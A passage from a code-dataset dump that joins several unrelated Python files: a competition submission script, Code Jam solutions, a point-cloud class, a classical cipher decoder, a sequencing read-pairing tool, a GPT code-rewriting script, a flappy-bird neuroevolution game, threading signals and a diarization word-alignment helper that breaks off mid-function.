= list(train_target)\r\ndiff_train = pd.merge(diff_train, train[['compare_id', 'compare_target']], how='left', on='compare_id')\r\ndiff_train['pre_target_diff'] = oof_lgb\r\ndiff_train['pre_target'] = diff_train['pre_target_diff'] + diff_train['compare_target']\r\n# \r\nmean_result = diff_train.groupby('样本id')['pre_target'].mean().reset_index(name='pre_target_mean')\r\ntrue_result = train[['样本id', 'compare_target']]\r\nmean_result = pd.merge(mean_result, true_result, how='left', on='样本id')\r\nprint(\"CV score: {:<8.8f}\".format(mean_squared_error(oof_lgb, target)))\r\nprint(\"CV score: {:<8.8f}\".format(mean_squared_error(mean_result['pre_target_mean'].values, mean_result['compare_target'].values)))\r\n\r\n# Get Test Target\r\ndiff_test['compare_id'] = diff_test['样本id'] - diff_test['样本id_difference']\r\ndiff_test = pd.merge(diff_test, train[['compare_id', 'compare_target']], how='left', 
on='compare_id')\r\ndiff_test['pre_target_diff'] = predictions_lgb\r\ndiff_test['pre_target'] = diff_test['pre_target_diff'] + diff_test['compare_target']\r\n#\r\nmean_result_test = diff_test.groupby(diff_test['样本id'], sort=False)['pre_target'].mean().reset_index(name='pre_target_mean')\r\ntest = pd.merge(test, mean_result_test, how='left', on='样本id')\r\n\r\n# Submission\r\nsub_df = pd.DataFrame()\r\nsub_df[0] = test_id\r\nsub_df[1] = test['pre_target_mean']\r\nsub_df[1] = sub_df[1].apply(lambda x: round(x, 5))\r\n# Processing Special Case\r\nfor v in test_select.keys():\r\n\tif v == 280:\r\n\t\tx = 0.947\r\n\telif v == 360:\r\n\t\tx = 0.925\r\n\telif v == 385 or v == 785:\r\n\t\tx = 0.879\r\n\telif v == 390:\r\n\t\tx = 0.89\r\n\tprint(v)\r\n\tprint(test_select[v])\r\n\tsub_df.loc[test_select[v], 1] = x\r\nsub_df.to_csv('submit_B.csv', index=False, header=False)\r\nprint('Submit Done!')\r\n","repo_name":"nlceyes/TianChi-JinNan","sub_path":"Run-Pre.py","file_name":"Run-Pre.py","file_ext":"py","file_size_in_byte":7840,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"23396325071","text":"import math\r\ndef fs(a,b):\r\n global summ\r\n summ = 0\r\n for j in range(a,b+1):\r\n if (str(j))[::-1] == str(j):\r\n if math.sqrt(j) % 1 == 0:\r\n x = str(int(math.sqrt(j)))\r\n if x[::-1] ==str(str(int(math.sqrt(j)))):\r\n summ = summ + 1\r\n return (summ)\r\n\r\ninfile = open(\"C-small-attempt0.IN\", 'r')\r\noutfile = open(\"C-small\",'w')\r\nlines = infile.readlines()\r\nnum = []\r\n\r\ni = 1\r\nfor line in lines:\r\n if i != len(lines):\r\n num.append(line[:-1])\r\n i += 1\r\n else:\r\n num.append(line)\r\n\r\nnum.pop(0)\r\nspace = []\r\nfor i in num:\r\n posn = 0\r\n for j in i:\r\n if j == ' ':\r\n space.append(posn)\r\n break\r\n else:\r\n posn += 1\r\n\r\n#print(num)\r\n\r\nposition = 0\r\nfor i in num:\r\n x = space[position]\r\n a = int(i[0:x])\r\n b = int(i[x:])\r\n fs(a,b)\r\n position += 1\r\n outfile.write(\"Case #\" + str(position) + \": \"+ str(summ) + '\\n')\r\n\r\n\r\n\r\n\r\ninfile.close()\r\noutfile.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/2976.py","file_name":"2976.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23610882161","text":"class MyWire:\r\n\tdef __init__(self, a, b):\r\n\t\tself.a = a\r\n\t\tself.b = b\r\n\r\n\tdef getA(self):\r\n\t\treturn self.a\r\n\r\n\tdef getB(self):\r\n\t\treturn self.b\r\n\r\n\r\ndef getIntersectionCnt(wireCnt, wires):\r\n\twires.sort(key=lambda k: k.getA())\r\n\tcnt = 0\r\n\tfor i in range(wireCnt):\r\n\t\twire1 = wires[i]\r\n\t\tfor j in range(i+1, wireCnt):\r\n\t\t\twire2 = wires[j]\r\n\t\t\tif wire1.getB() > wire2.getB():\r\n\t\t\t\tcnt = cnt + 1\r\n\treturn cnt\r\n\r\n\r\nimport sys\r\n\r\nfileNamePrefix = sys.argv[1]\r\nfileNameIn = fileNamePrefix + \".in\"\r\nfileNameOut = fileNamePrefix + \".out\"\r\n\r\nfileIn = open(fileNameIn, 'r')\r\nlines = fileIn.readlines()\r\n\r\ntestcnt = int(lines[0])\r\nidx = 1\r\n\r\nfileOut = open(fileNameOut, 'w')\r\n\r\nfor test in range(testcnt):\r\n\tline = lines[idx].split(' ')\r\n\tidx += 1\r\n\twireCnt = int(line[0])\r\n\r\n\twires = []\r\n\tfor i in range(wireCnt):\r\n\t\tline = lines[idx].split(' ')\r\n\t\tidx += 1\r\n\t\twires.append( MyWire( int(line[0]), int(line[1]) ) )\r\n\r\n\tres = getIntersectionCnt(wireCnt, wires)\r\n\r\n\tfileOut.write(\"Case #{0}: {1}\\n\".format(test + 
1, res))\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_62/92.py","file_name":"92.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14671468658","text":"import torch\nfrom torch_scatter import scatter_mean\nimport logging\n\nfrom .base_cloud import Cloud\n\nlog = logging.getLogger(__name__)\n\n\nclass SuperpointCloud(Cloud):\n def __init__(self, path: str, size: int, cloud_id: int,\n superpoint_map: torch.Tensor,\n diversity_aware: bool, labels: torch.Tensor,\n surface_variation: torch.Tensor,\n color_discontinuity: torch.Tensor = None):\n super().__init__(path, size, cloud_id, diversity_aware, labels,\n surface_variation, color_discontinuity)\n self.superpoint_map = superpoint_map\n\n self.values = None\n self.features = None\n self.ids = torch.full((self.num_superpoints,), self.id, dtype=torch.long)\n self.superpoint_indices, self.superpoint_sizes = torch.unique(self.superpoint_map, return_counts=True)\n\n @property\n def num_superpoints(self) -> int:\n return self.superpoint_map.max().item() + 1\n\n @property\n def superpoint_labels(self) -> torch.Tensor:\n label_mean = scatter_mean(self.labels.float(), self.superpoint_map, dim=0)\n return torch.round(label_mean).long()\n\n def _save_metric(self, values: torch.Tensor, features: torch.Tensor = None) -> None:\n self.values = scatter_mean(values, self.superpoint_map, dim=0)\n if features is not None:\n self.features = scatter_mean(features, self.superpoint_map, dim=0)\n\n def __str__(self):\n ret = f'\\nSuperpointCloud:\\n' \\\n f'\\t - Cloud ID = {self.id}, \\n' \\\n f'\\t - Cloud path = {self.path}, \\n' \\\n f'\\t - Number of voxels in cloud = {self.size}\\n' \\\n f'\\t - Number of superpoints in cloud = {self.num_superpoints}\\n' \\\n f'\\t - Number of model predictions = {self.predictions.shape[0]}\\n'\n if self.num_classes > 0:\n ret += f'\\t - Number of semantic classes = {self.num_classes}\\n'\n ret += f'\\t - Percentage labeled = {torch.sum(self.label_mask) / self.size * 100:.2f}%\\n'\n return ret\n","repo_name":"aleskucera/MuVAL","sub_path":"src/selection/superpoint_cloud.py","file_name":"superpoint_cloud.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23561318911","text":"def update(A,j):\r\n for i in range(len(A)-1,j-1,-1):\r\n A[i] = 9;\r\n A[j-1] = A[j-1] - 1;\r\n return A;\r\n\r\ndef magic(numList):\r\n s = ''.join(map(str, numList))\r\n return int(s)\r\n\r\ninput_f = open('B-small-attempt0.in' , 'r');\r\noutput_f = open('B_output.txt' , 'w');\r\nT = int(float(input_f.readline()));\r\n\r\nfor i in range(1,T+1):\r\n num = int(float(input_f.readline()));\r\n check = 0;\r\n A = [int(x) for x in str(num)];\r\n for j in range(len(A)-1,0,-1):\r\n if A[j] < A[j-1]:\r\n A = update(A,j);\r\n \r\n tidy = magic(A);\r\n out = 'Case #' + str(i) + ': ' + str(tidy) + '\\n';\r\n output_f.write(out);\r\n \r\n \r\noutput_f.close();\r\ninput_f.close();\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/4350.py","file_name":"4350.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27163105109","text":"#!/usr/bin/python3\n\n#text = 'sg kof swbaoz gqvcsbs uswgvo boasbg robw' #bsp fuer rot verschiebung\n#text='aa ab ac ad ae ba bb bc bd be ca cb cc cd ce da db 
dc dd de ea eb ec ed ee' #example for square (Polybius)\n#text='1424154315422531114244155344244344241544554455455115424313233145154343153133' #example for Caesar square\n#text='twwnp zoaas wnuhz bnwwg snbvc slypm m' #example for Vigenere, pw HOUGHTON\ntext='kt tz zk wb xl ow ov kz kd lo po ur n' # example for Playfair\n\n\n#TODO fix that it only works for lowercase letters\nalphabet = 'abcdefghijklmnopqrstuvwxyz'\nalphabet_25 = 'abcdefghiklmnopqrstuvwxyz'\n\n#split abc \nalphabet_25_split=[alphabet_25[i:i+1] for i in range(0,len(alphabet_25),1)]\n\nkeywords_ger=['die','der','das','und','in', 'zu', 'ich', 'hab', 'werd', 'sie', 'von', 'mit'] \nkeywords_en=['the','be','to', 'of', 'and', 'in', 'that', 'have', 'it', 'for'] \n\n#set language for spell checker\nkeywords=keywords_ger\n\n#-----ROT-Verschiebung------------------------------------------------\n\ndef rot_verschiebung(text):\n text_split=text.split()\n\n success=0\n words=len(text_split)\n\n print(' ROT-Verschiebung:')\n for move in range(0,26):\n decoded=\"\"\n for word in range(0,words):\n new_text= ''.join((chr(97+(ord(letter)-97+move)%26) for letter in text_split[word]))\n decoded= decoded + ' ' + new_text\n #check for most common keywords\n for key in range (0,len(keywords)):\n if keywords[key] in decoded:\n print(move,'match with', keywords[key], ': ', decoded)\n success=1\n if success==0:\n print('no match with keywords')\n # print (move, ':', decoded)\n\n#--------------------------------------------------------------------\n\n\n#---square chiffre--------------------------------------------\n\ndef square_chiffre(text,pw1,pw2):\n\n print('\\n Polybios chiffre (square)')\n\n matrix=''\n decrypt=''\n success=0\n text_strip=text.replace(\" \",\"\") #get rid of spaces\n words=len(text_strip)\n \n #Password and text split\n pw1_split=[pw1[i:i+1] for i in range(0, 5, 1)]\n pw2_split=[pw2[i:i+1] for i in range(0, 5, 1)]\n text_split=[text_strip[i:i+2] for i in range(0, len(text_strip), 2)]\n\n #Set up the matrix\n for i in range(0,len(pw1)):\n for j in range(0,len(pw2)):\n matrix+=pw1_split[i] + pw2_split[j]\n \n matrix_split=[matrix[i:i+2] for i in range (0,len(matrix), 2)]\n\n #decrypting\n for i in range(0,len(text_split)):\n for j in range(0,len(matrix_split)):\n if text_split[i]==matrix_split[j]:\n decrypt+=alphabet_25_split[j]\n #check for most common keywords\n for key in range (0,len(keywords)):\n if keywords[key] in decrypt:\n print('match with', keywords[key], ': ', decrypt)\n success=1\n if success==0:\n print('no match with keywords')\n#-------------------------------------------------------------\n\n#--Vigenere chiffre-------------------------------------------\n\ndef vigenere(text,pw):\n print('\\nVigenere cipher')\n decode=''\n text_strip=text.replace(\" \",\"\") #get rid of spaces\n pw_split=[pw[i:i+1] for i in range(0, len(pw), 1)]\n text_split=[text_strip[i:i+1] for i in range(0, len(text_strip), 1)]\n \n for letter in range(0,len(text_strip)):\n i= letter%len(pw)\n shift=alphabet.index(text_split[letter])- alphabet.index(pw_split[i])\n if shift < 0:\n shift+=26\n decode+=alphabet[shift]\n print('Decoded with password',pw,':',decode)\n#-------------------------------------------------------------\n\n\n#-Playfair Cypher --------------------------------------------\n\ndef playfair(text, key):\n print('\\nPlayfair cipher')\n temp=[]\n new_key=[]\n decrypt=[]\n decode=''\n add_letter=0\n\n text_strip=text.replace(\" \",\"\") #get rid of spaces\n\n #get an even amount of letters and split them into pairs\n if len(text_strip)%2==1:\n 
text_strip=text_strip+'a'\n add_letter=1\n text_split=[text_strip[i:i+1] for i in range(0, len(text_strip), 1)]\n\n #for i in range(0,len(text_split)-1):\n # if text_split[2*i+1]==text_split[2*i]: #TODO find a rule for the exception of double letters\n \n \n #split key and remove double letters\n key_split=[key[i:i+1] for i in range(0,len(key), 1)] \n for i in range (0,len(key_split)): \n if key_split[i] not in temp:\n new_key[len(new_key):]=key_split[i]\n temp[len(temp):]=key_split[i]\n\n #reduce alphabet by key letters and add key in front\n for i in range(0, len(new_key)):\n alphabet_25_split.remove(new_key[i])\n new_key+=alphabet_25_split\n\n #check which of the three cases applies for the letter pairs if key would be aligned in a 5x5 matrix\n #1) in one column 2) in one row 3) not at all correlated\n for i in range(0,len(text_split), 2):\n pos1= new_key.index(text_split[i])\n pos2= new_key.index(text_split[i+1])\n\n if pos1%5==pos2%5: #criteria for columns\n if pos1>=5:\n pos1-=5\n else:\n pos1+=20\n if pos2>=5:\n pos2-=5\n else: \n pos2+=20\n decrypt.append(new_key[pos1])\n decrypt.append(new_key[pos2])\n \n elif abs(pos1-pos2)<4: #criteria for rows\n if pos1%5==0:\n pos1+=4\n else:\n pos1-=1\n if pos2%5==0:\n pos2+=4\n else:\n pos2-=1\n decrypt.append(new_key[pos1])\n decrypt.append(new_key[pos2])\n\n else: #everything else\n temp1=pos1//5*5+pos2%5\n temp2=pos2//5*5+pos1%5\n decrypt.append(new_key[temp1])\n decrypt.append(new_key[temp2])\n \n #remove additional letter again and align the decrypted list to a string\n if add_letter==1:\n decrypt.pop()\n for i in range(0,len(decrypt)):\n decode+=decrypt[i]\n print('Decoded with password',key,':',decode)\n#-------------------------------------------------------------\n\n#TODO add if clauses to skip inapplicable ciphers (eg ROT shift for numbers etc)\n\n\nrot_verschiebung(text)\nsquare_chiffre(text,'12345','12345')\nvigenere(text,'houghton')\nplayfair(text,'butzelbaer')\n","repo_name":"PaulMatthias/Projects","sub_path":"codebreaker.py","file_name":"codebreaker.py","file_ext":"py","file_size_in_byte":6399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33341760798","text":"\"\"\"Pair reads.\n\nConvenience wrapper to both form pairs (pairs_from_summary) and filter them\n(filter_pairs).\n\"\"\"\n\nfrom argparse import ArgumentDefaultsHelpFormatter, ArgumentParser\n\nimport pysam\n\nimport duplex_tools\nfrom duplex_tools.filter_pairs import add_args as add_filter_args\nfrom duplex_tools.filter_pairs import filter_candidate_pairs_by_aligning\nfrom duplex_tools.pairs_from_summary import add_args as add_pair_args\nfrom duplex_tools.pairs_from_summary import find_pairs\n\n\ndef pair_and_align(input_bam,\n max_time_between_reads,\n max_seqlen_diff,\n max_abs_seqlen_diff,\n min_qscore,\n bases_to_align,\n min_length,\n max_length,\n output_dir,\n align_threshold,\n no_end_penalties,\n penalty_open,\n penalty_extend,\n score_match,\n score_mismatch,\n threads,\n **kwargs):\n \"\"\"Pair and align reads from an unmapped bam.\n\n :param input_bam: The input bam file (containing unmapped reads)\n :param output_dir: The output directory (the pair_ids_filtered.txt is here)\n :param max_time_between_reads: see pairs_from_summary\n :param max_seqlen_diff: see pairs_from_summary\n :param max_abs_seqlen_diff: see pairs_from_summary\n :param min_qscore: see pairs_from_summary\n :param bases_to_align: see filter_pairs\n :param min_length: see filter_pairs\n :param max_length: see filter_pairs\n 
\"\"\"\n logger = duplex_tools.get_named_logger(\"Pair\")\n find_pairs(input_bam,\n outdir=output_dir,\n max_time_between_reads=max_time_between_reads,\n max_seqlen_diff=max_seqlen_diff,\n max_abs_seqlen_diff=max_abs_seqlen_diff,\n min_qscore=min_qscore,\n )\n filter_candidate_pairs_by_aligning(f'{output_dir}/pair_ids.txt',\n reads_path=input_bam,\n bases_to_align=bases_to_align,\n min_length=min_length,\n max_length=max_length,\n align_threshold=align_threshold,\n no_end_penalties=no_end_penalties,\n penalty_open=penalty_open,\n penalty_extend=penalty_extend,\n score_match=score_match,\n score_mismatch=score_mismatch,\n threads=threads\n )\n\n npairs = sum(1 for _ in open(f'{output_dir}/pair_ids_filtered.txt'))\n nreads = pysam.AlignmentFile(input_bam, check_sq=False).count(\n until_eof=True)\n logger.info(f'Initial reads: {nreads}')\n logger.info(f'Created pairs: {npairs}')\n logger.info(f'Paired reads: {2 * npairs}')\n logger.info(f'Approximate duplex rate for {input_bam}: '\n f'{2*100*npairs / nreads:.2f}%')\n\n\ndef argparser():\n \"\"\"Create argument parser.\"\"\"\n parser = ArgumentParser(\n \"Filter candidate read pairs by basecall alignment.\",\n formatter_class=ArgumentDefaultsHelpFormatter,\n parents=[duplex_tools._log_level()],\n add_help=False)\n parser.add_argument(\n \"bam\",\n help=\"A bam file from dorado.\")\n parser.add_argument(\n \"--output_dir\",\n help=\"The output directory\", default='pairs_from_bam')\n\n parser = add_pair_args(parser)\n parser = add_filter_args(parser)\n\n return parser\n\n\ndef main(args):\n \"\"\"Entry point.\"\"\"\n pair_and_align(input_bam=args.bam,\n output_dir=args.output_dir,\n max_time_between_reads=args.max_time_between_reads,\n max_seqlen_diff=args.max_seqlen_diff,\n max_abs_seqlen_diff=args.max_abs_seqlen_diff,\n min_qscore=args.min_qscore,\n bases_to_align=args.bases_to_align,\n min_length=args.min_length,\n max_length=args.max_length,\n no_end_penalties=args.no_end_penalties,\n align_threshold=args.align_threshold,\n penalty_open=args.penalty_open,\n penalty_extend=args.penalty_extend,\n score_match=args.score_match,\n score_mismatch=args.score_mismatch,\n threads=args.threads,\n )\n","repo_name":"nanoporetech/duplex-tools","sub_path":"duplex_tools/pair.py","file_name":"pair.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"61"} +{"seq_id":"8420255665","text":"import pygame\nfrom hiddenAI.sequential import * \nfrom hiddenAI.neat import NEAT\nfrom hiddenAI.optimizers import * \nfrom hiddenAI.layers.main_layers import *\nfrom hiddenAI.layers.activations import *\nimport random\n\nWIDTH = 800\nHEIGHT= 700\nSCREEN = pygame.display.set_mode((WIDTH,HEIGHT))\nclass Pillar:\n\tdef __init__(self,xvalue,opening_start):\n\t\tOPENINGHEIGHT = 200\n\t\tself.xvalue = xvalue\n\t\tself.opening_start = opening_start\n\t\tself.opening_end = opening_start+OPENINGHEIGHT\n\t\tself.delete = False\n\n\tdef draw(self,bird_position_x):\n\t\tif (-100<=self.xvalue-bird_position_x<=WIDTH):#-100 is the width of a pillar\n\t\t\tpass\n\t\telif self.xvalue-bird_position_x<-100:\n\t\t\tself.delete = True\n\t\t\treturn\n\t\telse:\n\t\t\treturn\n\t\tpygame.draw.rect(SCREEN,(255,255,255),pygame.Rect(self.xvalue-bird_position_x,0,100,self.opening_start))\n\t\tpygame.draw.rect(SCREEN,(255,255,255),pygame.Rect(self.xvalue-bird_position_x,self.opening_end,100,HEIGHT-self.opening_end))\n\n\tdef detect_collision(self,bird_position,bird_size = 10):\n\t\tscreen_x = self.xvalue - 
bird_position[0]\n\t\tbird_screen_position = (200,bird_position[1])\n\t\tif screen_x-bird_size <= bird_screen_position[0]<= screen_x+bird_size+100:#100 is the width of a pillar\n\t\t\treturn bird_position[1] + bird_size> self.opening_end or bird_position[1] - bird_size < self.opening_start\nclass Bird:\n\tdef __init__(self):\n\t\tself.yvalue = HEIGHT/2\n\t\tself.velocity = 0\n\t\tself.score = 0\n\t\tself.alive = True\n\t\tself.can_flap = 0\t\n\n\tdef tick(self,dt,flap = False):\n\t\tif self.alive:\n\t\t\tself.score += dt\n\t\tself.yvalue += self.velocity * dt\n\t\tif self.yvalue < 0 or self.yvalue > HEIGHT:\n\t\t\tself.alive = False\n\t\tself.draw()\n\t\tif flap and self.can_flap <= 0:\n\t\t\tself.flap()\n\t\t\tself.can_flap = 1/10\n\t\t\treturn\n\t\tself.can_flap -= dt\n\t\tself.velocity += 750 * dt #gravity is 750 pixels per second^2\n\n\tdef draw(self,bird_size = 10,x_center = 200):\n\t\tpygame.draw.rect(SCREEN,(125,0,125),pygame.Rect(x_center-bird_size,self.yvalue-bird_size,bird_size*2,bird_size*2))\n\n\tdef flap(self):\n\t\tself.velocity = -300\n\t\n\nnum_pillars = 10000\nnum_birds = 50\nmodel = Sequential(7,FullyConnected(3),Bias(),Sigmoid(),FullyConnected(2),Bias(),Sigmoid(),optimizer = None) \nneat = NEAT(model,num_per_generation = num_birds)\nall_bird_nets = [Sequential(7,FullyConnected(3),Bias(),Sigmoid(),FullyConnected(2),Bias(),Sigmoid(),optimizer = None) for _ in range(num_birds)] \nall_real_birds = [Bird() for _ in range(num_birds)]\nrunning = True\nclock = pygame.time.Clock()\ngen_num=0\nworld_x = 0\nwhile running:\n\tpillars = [Pillar(750*x + 1000,random.randint(0,HEIGHT-200)) for x in range(num_pillars)]#pillars are spaced 750 apart, and the first is 1000 away from the bird\n\tprint(\"GENERATION\",neat.generation,\"WORLD SCORE:\",world_x,\"MAX SCORE\",max([bird.score for bird in all_real_birds]))\n\tworld_x = 0\n\tgen_running = True\n\tall_bird_nets = neat.new_generation(all_bird_nets,[bird.score for bird in all_real_birds],mutation_max_size = 5)\n\tall_real_birds = [Bird() for _ in range(num_birds)]\n\tworld_score = 0\n\twhile gen_running:\n\t\tSCREEN.fill((0,0,0))\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\trunning = False\n\t\t\t\tgen_running = False\n\t\t\t\tbreak\n\t\tdead_pillars = []\n\t\tfor pillar_num,pillar in enumerate(pillars):\n\t\t\tpillar.draw(world_x)\n\t\t\tif pillar.delete:\n\t\t\t\tdead_pillars.append(pillar_num)\n\t\tfor pillar_num in reversed(dead_pillars):\n\t\t\tdel pillars[pillar_num]\n\t\tfirst_pillar = pillars[0] \n\t\tdt = clock.tick(24)/1000\n\t\tworld_x += dt* 250\n\t\talive = 0\n\t\tfor bird_num,bird_net in enumerate(all_bird_nets):\n\t\t\treal_bird = all_real_birds[bird_num]\n\t\t\tif not real_bird.alive:\n\t\t\t\tcontinue\n\t\t\treal_bird.score = world_x\n\t\t\treal_bird.draw()\n\t\t\tif first_pillar.detect_collision((world_x,real_bird.yvalue)):\n\t\t\t\treal_bird.alive = False\n\t\t\t\tcontinue\n\t\t\talive += 1\n\t\t\t\n\t\t\tresult = bird_net.run(np.array([real_bird.yvalue/HEIGHT,1-real_bird.yvalue/HEIGHT,real_bird.velocity/100,(first_pillar.opening_start)/HEIGHT,1-(first_pillar.opening_start)/HEIGHT,(first_pillar.xvalue-world_x)/1000,real_bird.can_flap]))\n\t\t\treal_bird.tick(dt,result[0]>result[1])\n\t\tif alive ==0:\n\t\t\tgen_running = 
False\n\t\tpygame.display.flip()\t\t\t\nneat.save_model_to_file(\"stored_weights/flappy_bird\")\t\n","repo_name":"enigmurl/hiddenAI","sub_path":"flappybird.py","file_name":"flappybird.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14863844008","text":"import constants\nimport prompts\nimport java\nimport os\nimport sys\nimport openai\nimport json\nimport requests\nimport os.path\n\n# Obtain main file path\nPATH = os.getcwd()\n\n# ChatGPT API Key Setup\nkey = constants.API_KEY_CHATGPT\nopenai.api_key = key\n\n# Test whether the user passed an argument naming the source file\n# Production of source file name, basename, and extension\n# Else exit the program\nif len(sys.argv) > 1:\n file_name = sys.argv[1]\n file_basename, file_extension = os.path.splitext(file_name)\nelse:\n print('No file provided. Run again with file name as argument.')\n exit()\n\n# Checking if there is already an output file that matches source file\n# If so, using subsequent prompt design vs. initial prompt design.\n# Also reads the output file in full to send to GPT.\nif os.path.isfile(PATH + f'\\\\output\\\\{file_name}'):\n request = prompts.sub_prompt(file_extension, file_name)\n os.chdir(PATH + '\\\\output')\n with open(file_name, 'r') as file:\n lines = file.readlines()\nelse:\n request = prompts.initial_prompt(file_extension, file_name)\n\n# Read the source file to send to GPT. This could be in tandem with\n# output file in order to use same format as last execution.\nos.chdir(PATH + '\\\\source')\nwith open(file_name, 'r') as file:\n lines = file.readlines()\n\ninputfile=\"\\n\".join(lines)\n\n# Submission of message to GPT model\nresponse=openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": request},\n {\"role\": \"user\", \"content\": inputfile}\n ]\n)\n\n# Receipt and formatting of return response\nfilecontents=response['choices'][0][\"message\"][\"content\"]\nfilecontents=filecontents.replace('\\n\\n', '\\n')\n\n# Writing the new output file based on GPT's modified source code\nos.chdir(PATH + '\\\\output')\noutput_path = os.getcwd()\nf = open(file_name, 'w+')\nf.write(filecontents)\nf.close()\n\n# Compile and run edited output file\njava.compile_java(output_path, file_name)\njava.execute_java(output_path, file_basename)","repo_name":"jstandfast/GPTracer","sub_path":"codetracer.py","file_name":"codetracer.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5433333595","text":"\"\"\" All the threading.Event settings. \"\"\"\nfrom threading import Event\n\n\nclass SignalThreadStarted(Event):\n \"\"\" A thread has successfully started. \"\"\"\n\nclass SignalThreadStopped(Event):\n \"\"\" A thread has successfully stopped. \"\"\"\n\nclass SignalThreadsAreStarted(Event):\n \"\"\" All the threads have started. \"\"\"\n\nclass SignalExit(Event):\n \"\"\" Some event demands to stop the program. \"\"\"\n\nclass SignalAllDone(Event):\n \"\"\" main.py signaling just before the exit for the testing purposes. \"\"\"\n\nclass SignalIncomingMessage(Event):\n \"\"\" A new message in the receiver message queue (rmq). \"\"\"\n\nclass SignalMessageToSend(Event):\n \"\"\" A new message to telegram in the sender message queue (smq). \"\"\"\n\nclass SignalUpdater(Event):\n \"\"\" A new updater cycle. 
\"\"\"\n\n\n# Threading signals\nSENDER_IS_RUNNING = SignalThreadStarted()\nUPDATER_IS_RUNNING = SignalThreadStarted()\nCONTROLLER_IS_RUNNING = SignalThreadStarted()\nRECEIVER_IS_RUNNING = SignalThreadStarted()\n\nSENDER_IS_STOPPED = SignalThreadStopped()\nUPDATER_IS_STOPPED = SignalThreadStopped()\nCONTROLLER_IS_STOPPED = SignalThreadStopped()\nRECEIVER_IS_STOPPED = SignalThreadStopped()\n\nALL_THREADS_ARE_GO = SignalThreadsAreStarted()\n\n\n# Other\nINCOMING_MESSAGE = SignalIncomingMessage()\nNEW_MESSAGE_TO_SEND = SignalMessageToSend()\nUPDATER_CYCLE = SignalUpdater()\n\nEXIT_SIGNAL = SignalExit()\n\nALL_DONE_SIGNAL = SignalAllDone()\n\n\ndef exit_signal(signal_=None, frame=None):\n \"\"\" System SIGINT and SIGTSTP. \"\"\"\n print()\n EXIT_SIGNAL.set()\n","repo_name":"voronokKita/LuckyBot","sub_path":"lucky_bot/helpers/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"28793998377","text":"import json\nimport logging\nfrom pathlib import Path\n\nfrom nemo.collections.asr.models.msdd_models import ClusteringDiarizer\nfrom omegaconf import OmegaConf\nimport whisperx\n\nfrom Configs import CACHE_DIRECTORY\n\nlogging.getLogger('nemo_logger').setLevel(logging.ERROR)\n\ndef get_words_speaker_mapping(wrd_ts, spk_ts, word_anchor_option=\"start\"):\n def get_word_ts_anchor(s, e, option=\"start\"):\n if option == \"end\":\n return e\n elif option == \"mid\":\n return (s + e) / 2\n return s\n\n s, e, sp = spk_ts[0]\n wrd_pos, turn_idx = 0, 0\n wrd_spk_mapping = []\n for wrd_dict in wrd_ts:\n ws, we, wrd = (int(wrd_dict[\"start\"] * 1000), int(wrd_dict[\"end\"] * 1000), wrd_dict[\"text\"],)\n wrd_pos = get_word_ts_anchor(ws, we, word_anchor_option)\n while wrd_pos > float(e) and (turn_idx != len(spk_ts) - 1):\n turn_idx += 1\n turn_idx = min(turn_idx, len(spk_ts) - 1)\n s, e, sp = spk_ts[turn_idx]\n result = {\"word\": wrd, \"start_time\": ws, \"end_time\": we, \"speaker\": sp}\n wrd_spk_mapping.append(result)\n return wrd_spk_mapping\n\n\ndef get_realigned_ws_mapping_with_punctuation(word_speaker_mapping, max_words_in_sentence=50):\n\n sentence_ending_punctuations = \".?!\"\n\n def get_first_word_idx_of_sentence(word_idx, word_list, speaker_list, max_words):\n is_word_sentence_end = (lambda x: x >= 0 and word_list[x][-1] in sentence_ending_punctuations)\n left_idx = word_idx\n while (\n left_idx > 0\n and word_idx - left_idx < max_words\n and speaker_list[left_idx - 1] == speaker_list[left_idx]\n and not is_word_sentence_end(left_idx - 1)\n ):\n left_idx -= 1\n\n return left_idx if left_idx == 0 or is_word_sentence_end(left_idx - 1) else -1\n\n def get_last_word_idx_of_sentence(word_idx, word_list, max_words):\n is_word_sentence_end = (lambda x: x >= 0 and word_list[x][-1] in sentence_ending_punctuations)\n right_idx = word_idx\n while (\n right_idx < len(word_list)\n and right_idx - word_idx < max_words\n and not is_word_sentence_end(right_idx)\n ):\n right_idx += 1\n\n return (\n right_idx\n if right_idx == len(word_list) - 1 or is_word_sentence_end(right_idx)\n else -1\n )\n\n is_word_sentence_end = (\n lambda x: x >= 0\n and word_speaker_mapping[x][\"word\"][-1] in sentence_ending_punctuations\n )\n wsp_len = len(word_speaker_mapping)\n\n words_list, speaker_list = [], []\n for k, line_dict in enumerate(word_speaker_mapping):\n word, speaker = line_dict[\"word\"], line_dict[\"speaker\"]\n words_list.append(word)\n speaker_list.append(speaker)\n\n k = 0\n 
